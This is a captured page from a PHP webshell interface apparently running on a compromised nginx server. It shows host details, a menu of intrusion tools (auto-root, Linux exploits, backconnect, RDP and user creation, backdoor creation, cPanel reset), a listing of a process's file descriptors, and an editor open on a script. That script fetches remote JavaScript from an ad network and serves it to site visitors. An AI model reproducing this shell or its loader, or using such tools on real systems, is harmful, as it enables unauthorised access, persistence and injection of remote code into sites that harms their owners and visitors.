Linux ubuntu 6.8.0-90-generic #91-Ubuntu SMP PREEMPT_DYNAMIC Tue Nov 18 14:14:30 UTC 2025 x86_64
nginx/1.24.0
: 67.217.245.49 | : 216.73.216.153
Cant Read [ /etc/named.conf ]
8.3.6
www-data
Bypass.pw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
proc /
691020 /
fd /
[ HOME SHELL ]
Name
Size
Permission
Action
111
150.89
KB
-rw-r--r--
117
151.48
KB
-rw-r--r--
13
373.21
MB
-rw-r-----
161
210.68
KB
-rw-r--r--
165
119.31
KB
-rw-r--r--
17
6.86
MB
-rw-r-----
181
154.24
KB
-rw-r--r--
19
6.42
KB
-rwxrwxrwx
190
140.07
KB
-rw-r--r--
192
95.93
KB
-rw-r--r--
2
6.86
MB
-rw-r-----
206
161.5
KB
-rw-r--r--
260
44.61
KB
-rwxrwxrwx
27
152.98
KB
-rwxrwxrwx
282
91.58
KB
-rw-r--r--
283
121.86
KB
-rw-r--r--
291
78.09
KB
-rw-r--r--
305
101.79
KB
-rw-r--r--
33
403.71
KB
-rwxrwxrwx
338
35.87
KB
-rw-r--r--
34
502.16
KB
-rwxrwxrwx
343
160.57
KB
-rw-r--r--
352
43.32
KB
-rw-r--r--
358
100.25
KB
-rw-r--r--
364
134.41
KB
-rw-r--r--
365
120.77
KB
-rw-r--r--
366
33.12
KB
-rw-r--r--
37
363.67
KB
-rwxrwxrwx
38
475.66
KB
-rwxrwxrwx
39
362.53
KB
-rwxrwxrwx
40
1.97
MB
-rwxrwxrwx
41
65.63
KB
-rwxrwxrwx
42
416.17
KB
-rwxrwxrwx
43
486.68
KB
-rwxrwxrwx
44
407.97
KB
-rwxrwxrwx
45
377.51
KB
-rwxrwxrwx
46
429.54
KB
-rwxrwxrwx
47
372.02
KB
-rwxrwxrwx
48
65.63
KB
-rwxrwxrwx
49
372.71
KB
-rwxrwxrwx
5
59.56
MB
-rw-r-----
50
428.64
KB
-rwxrwxrwx
51
399.94
KB
-rwxrwxrwx
52
558.41
KB
-rwxrwxrwx
53
320.06
KB
-rwxrwxrwx
54
387.41
KB
-rwxrwxrwx
55
132.05
KB
-rw-r--r--
58
106.17
KB
-rw-r--r--
59
154.89
KB
-rw-r--r--
60
108.67
KB
-rw-r--r--
61
182.9
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 19
<?php class AntiAdBlock { const TRANSPORT_CURL = 1; const TRANSPORT_FILE_GET_CONTENTS = 2; const TRANSPORT_SOCKET = 3; /** * @var string */ private $zoneId = '6126776-6126777'; /** * @var string */ private $key = 'i6N7PD1sBBXxFoExWEs7s7sWT0yxwnaeJ39EOQpR4g1ZpLBStCWpiaulxAmILw8d'; /** * @var string */ private $domain = 'hilltopads.com'; /** * @var string */ private $path = '/api/publisher/antiAdBlock'; /** * @var string */ private $version = '1.0'; /** * @var string */ private $userAgent = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'; /** * @var array */ private $urlParams = array(); private function makeRequest() { $response = $this->makeCurlRequest(); if ($response === false) { $response = $this->makeFileGetContentsRequest(); if ($response === false) { $response = $this->makeSocketRequest(); } } $result = ''; if (! empty($response)) { $response = json_decode($response, true); if (isset($response['result']['code'])) { $result = $response['result']['code']; } } return $result; } private function getUrl($transport) { return $this->domain . $this->getPath($transport); } private function getPath($transport) { $queryParams = array_merge($this->urlParams, array( 'zoneId' => $this->getZoneId(), 'key' => $this->key, 'version' => $this->version, 'transport' => $transport )); return $this->path . '?' . http_build_query($queryParams); } private function makeCurlRequest() { if (! extension_loaded('curl') || ! function_exists('curl_init')) { return false; } $resource = curl_init(); curl_setopt_array($resource, array( CURLOPT_RETURNTRANSFER => 1, CURLOPT_HEADER => false, CURLOPT_SSL_VERIFYPEER => true, CURLOPT_FOLLOWLOCATION => false, CURLOPT_USERAGENT => $this->userAgent )); $version = curl_version(); $url = $this->getUrl(self::TRANSPORT_CURL); if ($version['features'] & CURL_VERSION_SSL) { curl_setopt($resource, CURLOPT_URL, 'https://' . $url); } else { curl_setopt($resource, CURLOPT_URL, 'http://' . $url); } $response = curl_exec($resource); curl_close($resource); return $response; } private function makeFileGetContentsRequest() { if (! function_exists('file_get_contents') || ! ini_get('allow_url_fopen') || (function_exists('stream_get_wrappers') && ! in_array('http', stream_get_wrappers()))) { return false; } $url = $this->getUrl(self::TRANSPORT_FILE_GET_CONTENTS); if (function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) { $response = file_get_contents('https://' . $url); } else { $response = file_get_contents('http://' . $url); } return $response; } private function makeSocketRequest() { $resource = null; if (function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) { $resource = fsockopen('ssl://' . $this->domain, 443); } if (! $resource) { $resource = fsockopen('tcp://' . gethostbyname($this->domain), 80); } if (! $resource) { return false; } $headers = "GET " . $this->getPath(self::TRANSPORT_SOCKET) . " HTTP/1.1\r\n"; $headers .= "Host: " . $this->domain . "\r\n"; $headers .= "User-Agent: " . $this->userAgent . "\r\n"; $headers .= "Connection: close\r\n\r\n"; fwrite($resource, $headers); $response = ''; while (! feof($resource)) { $response .= fgets($resource, 1024); } fclose($resource); $response = substr($response, strpos($response, "\r\n\r\n") + 4); $response = substr($response, strpos($response, "{")); $response = substr($response, 0, strrpos($response, "}") + 1); return $response; } private function getTempDir() { if (! function_exists('sys_get_temp_dir')) { foreach (['TMP', 'TMPDIR', 'TEMP'] as $envKey) { if (! empty($_ENV[$envKey])) { return realpath($_ENV[$envKey]); } } $tempFile = tempnam(dirname(__FILE__), ''); if (file_exists($tempFile)) { unlink($tempFile); return realpath(dirname($tempFile)); } return null; } else { return sys_get_temp_dir(); } } private function getZoneId() { if (is_numeric($this->zoneId)) { return $this->zoneId; } $zoneIds = explode('-', $this->zoneId); $this->zoneId = $zoneIds[0]; $userAgent = $_SERVER['HTTP_USER_AGENT']; if (count($zoneIds) === 2 && ( stristr($userAgent, 'mobi') !== false || stristr($userAgent, 'ipad') !== false || stristr($userAgent, 'iphone') !== false || stristr($userAgent, 'blackberry') !== false || stristr($userAgent, 'android') !== false ) ) { $this->zoneId = $zoneIds[1]; } return $this->zoneId; } public function getCode() { $errorLevel = error_reporting(0); if (! empty($_GET)) { $this->urlParams = $_GET; } $file = $this->getTempDir() . '/hta-' . $this->getZoneId() . md5(serialize($this->urlParams)) . '.js'; if (file_exists($file) && time() - filemtime($file) < 300) { error_reporting($errorLevel); return file_get_contents($file); } $code = $this->makeRequest(); if (! empty($code)) { file_put_contents($file, $code); } error_reporting($errorLevel); return $code; } } header('Content-Type: application/javascript'); $antiAdBlock = new AntiAdBlock(); echo $antiAdBlock->getCode();
Close